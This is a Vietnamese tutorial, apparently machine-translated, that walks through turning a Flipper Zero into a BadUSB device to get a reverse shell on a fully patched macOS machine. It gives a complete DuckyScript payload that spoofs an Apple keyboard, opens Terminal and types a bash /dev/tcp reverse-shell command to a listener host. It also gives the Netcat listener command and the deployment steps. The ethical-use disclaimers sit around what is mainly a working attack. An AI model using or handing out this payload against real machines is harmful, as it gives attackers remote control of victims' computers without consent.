Cách lấy Reverse Shell trên macOS bằng Flipper Zero làm BadUSB

Bằng cách sử dụng Flipper Zero, một tệp văn bản DuckyScript ngắn 12 dòng và một trình nghe từ xa trên máy chủ Ubuntu của mình, tôi đã có thể có được trình bao trên máy tính macOS Ventura cập nhật, được vá đầy đủ của mình.

Trong môi trường phòng thí nghiệm của mình, tôi sử dụng Flipper Zero như một thiết bị dồn nén để kiểm tra các lỗ hổng trong máy chủ và hệ thống máy tính để bàn của mình.

Flipper Zero là công cụ hack đạo đức ưa thích của chúng tôi vì nó cung cấp vô số tải trọng có sẵn, có công cụ chọn menu trên màn hình và sử dụng màn hình tiến trình để cung cấp phản hồi.

Bài viết này là một ví dụ về cách sử dụng Flipper Zero như một thiết bị BadUSB kiểm tra đạo đức và cách tránh trở thành nạn nhân của việc khai thác như vậy. Không sử dụng điều này trên các máy tính mà bạn không sở hữu hoặc không được phép sử dụng. Mã này không cố gắng che giấu khỏi Hệ thống Phát hiện Xâm nhập (IDS), Hệ thống Ngăn chặn Xâm nhập (IPS), Hệ thống Phát hiện Mạng, Tường lửa hoặc phần mềm Chống Vi-rút (AV).

Tải trọng BadUSB

Flipper Zero BadUSB cũng như một số thiết bị BadUSB khác sử dụng tải trọng được viết bằng DuckyScript. Một ngôn ngữ kịch bản đơn giản để thực hiện thao tác gõ phím dẫn đến một cuộc tấn công tiêm nhiễm bàn phím.

Một điểm khởi đầu tốt cho Tải trọng Duckyscript là trang web chính thức của Hak5:

. Tại đây, bạn sẽ tìm thấy các ví dụ và tài liệu về cách sử dụng DuckScript.

Hãy viết một số DuckyScript

Bạn có thể sử dụng tập lệnh được tạo sẵn hoặc bạn có thể học cách viết của riêng mình. Chúng tôi sẽ chỉ cho bạn cách khai thác trình bao đảo ngược trên máy tính macOS theo hướng dẫn từng bước đơn giản.

Sử dụng trình soạn thảo văn bản yêu thích của bạn và nhập văn bản sau. MacOS có ứng dụng TextEdit được cài đặt theo mặc định, vì vậy chúng tôi sẽ sử dụng ứng dụng đó.

ID 05ac:021e Apple:Keyboard

DELAY 1000

GUI SPACE

DELAY 200

STRING terminal

DELAY 200

ENTER

DELAY 1000

STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1

DELAY 1000

ENTER

DELAY 1000

Đối với hướng dẫn này, chúng ta không cần biết nhiều về DuckyScript, vì vậy chúng ta sẽ xem qua một số lệnh mà tập lệnh của chúng ta sử dụng. Thực sự chỉ có năm lệnh khác nhau mà chúng tôi sử dụng.

Yêu cầu	Sự mô tả
ID 05ac:021e Apple:Bàn phím	Dòng này cho macOS biết Flipper Zero của chúng tôi thực sự là Bàn phím Apple. Nếu bạn không sử dụng dòng này, macOS sẽ hiển thị hộp thoại Hỗ trợ thiết lập bàn phím, điều này sẽ khiến tập lệnh của bạn không thành công.
SỰ CHẬM TRỄ	Lệnh này hướng dẫn hệ điều hành đợi trong một khoảng thời gian. Nếu chúng tôi không sử dụng những độ trễ này, tập lệnh sẽ chạy quá nhanh và không thành công.
KHÔNG GIAN GUI	Nhấn phím Apple Command và thanh Dấu cách để mở cửa sổ 'Tìm kiếm Spotlight'.
Nhà ga STRING	Nhập chuỗi 'Terminal' vào cửa sổ Tìm kiếm Spotlight
ĐI VÀO	Nhấn phím ENTER hoặc Return trên bàn phím của bạn. Sau khi nhấn phím ENTER, macOS sẽ khởi chạy cửa sổ Terminal (/Applications/Utilities/Terminal)
CHUỖI bash -i >& /dev/tcp/10.10.10.157/4444 0>&1	Lệnh này nhập văn bản vào cửa sổ đầu cuối để thiết lập kết nối với máy chủ Netcat đang nghe tại 10.10.10.157 trên Cổng 4444

Thay đổi địa chỉ IP tại 10.10.10.157 và Cổng 4444 thành địa chỉ IP và cổng của máy chủ của bạn.

Lưu tệp này vào đĩa của bạn dưới dạng rev_shell_macos.txt . Không có tổ chức thư mục con nào trong thư mục badusb trên Flipper Zero, vì vậy nếu bạn đang sử dụng nhiều tải trọng cho các hệ điều hành khác nhau, hãy sử dụng quy ước đặt tên có ý nghĩa gì đó đối với bạn để bạn biết nó làm gì.

Cài đặt ứng dụng qflipper

Nếu bạn chưa cài đặt ứng dụng qflipper, hãy truy cập trang cập nhật Chính thức của Flipper Zero và chọn trình cài đặt cho hệ điều hành của bạn. Trang này là trang cập nhật chương trình cơ sở, nhưng ở dưới cùng là các liên kết để cài đặt ứng dụng qflipper.

Làm theo hướng dẫn dành cho hệ điều hành của bạn để cài đặt ứng dụng qflipper.

Bắt Duckyscript lên Flipper Zero

Mở ứng dụng qflipper và chọn biểu tượng thư mục được đánh dấu màu đỏ.

Chọn và nhấp đúp vào biểu tượng Thẻ SD để xem nội dung.

Xác định vị trí và kéo tệp rev_shell_macos.txt mà chúng tôi đã tạo trước đó vào thư mục badusb .

Tháo Flipper Zero khỏi máy tính của bạn khi sao chép xong tệp.

Chờ đợi một Shell đảo ngược

Flipper Zero BadUSB được trang bị và sẵn sàng sử dụng. Nhưng trước tiên, chúng ta cần thiết lập trình nghe từ xa trên máy chủ của mình. Trên máy chủ Ubuntu của chúng tôi, hãy khởi động trình nghe Netcat bằng lệnh sau:

$ nc -nlvp 4444

Sự cố của lệnh được liệt kê trong bảng sau. Một lần nữa, bạn không thực sự cần biết điều gì đang xảy ra khi sử dụng lệnh này, ngoài việc nó đang chờ kết nối đến.

Yêu cầu	Tùy chọn
nc	lệnh netcat
-nlvp	( n ) không có độ phân giải DNS, ( l ) lắng nghe kết nối đến, ( v ) đầu ra chi tiết, ( p ) cổng
4444	Số cổng để nghe trên

Giờ đây, trình nghe Netcat của chúng ta đã sẵn sàng và đang chờ kết nối đến, chúng ta có thể tiến hành cuộc tấn công Flipper Zero BadUSB.

Khởi động BadUSB Reverse Shell

Phần khó khăn đã xong. Tệp Flipper Zero BadUSB reverse_shell_macos.txt được ghi, chuyển sang Flipper Zero và trình nghe Netcat đang chờ kết nối.

Xác định vị trí menu Bad USB và chọn nút Run. Chưa kết nối Flipper Zero với máy tính của bạn. Flipper Zero sẽ cho bạn biết khi nào nên kết nối thiết bị của mình.

Điều hướng đến tệp DuckyScript mà chúng tôi đã sao chép ở bước trước. Nếu bạn không thấy tệp này thì bạn đã sao chép nó vào thư mục sai. Chọn rev_shell_macos và nhấp vào nút Chạy.

Khi thấy cảnh báo Kết nối với USB , bạn có thể kết nối Flipper Zero với cổng USB của iMac hoặc MacBook. Nhấp vào nút Chạy.

Bạn có thể xem tiến trình của tập lệnh BadUSB trong cửa sổ chính. Khi trạng thái đạt 100%, tải trọng đã hoàn tất và bạn có thể gỡ bỏ Flipper Zero.

Nếu bạn đang xem màn hình máy tính của iMac, bạn có thể thấy cách khai thác khi nó thực thi DuckyScript. Trình nghe Netcat trên máy chủ Ubuntu của chúng tôi hiển thị kết quả của yêu cầu thành công.

Kiểm soát máy tính của bạn

Bây giờ bạn có quyền kiểm soát máy tính macOS thông qua trình bao đảo ngược. Chạy trên phiên bản BSD Linux, bạn có thể sử dụng các công cụ dòng lệnh Unix và trình bao BASH như thể bạn đang ngồi trên bàn phím vật lý của iMac.

Bạn có thể sử dụng các lệnh Linux thông thường như whoami , pwd , ls hoặc cd để điều hướng hệ thống tệp và thao tác với hệ điều hành.

Bước tiếp theo

Bây giờ bạn đã hiểu về cách Flipper Zero hoạt động như một thiết bị BadUSB, bạn có thể tạo tập lệnh của riêng mình. Sử dụng trang web Hak5 hoặc một trong nhiều kho DuckyScript GitHub có sẵn thông qua tìm kiếm trên Google làm điểm bắt đầu cho các tệp Duckyscript của riêng bạn.

Hoạt động hợp pháp và có đạo đức. Sử dụng công cụ này trên các thiết bị mà bạn sở hữu hoặc có quyền sử dụng.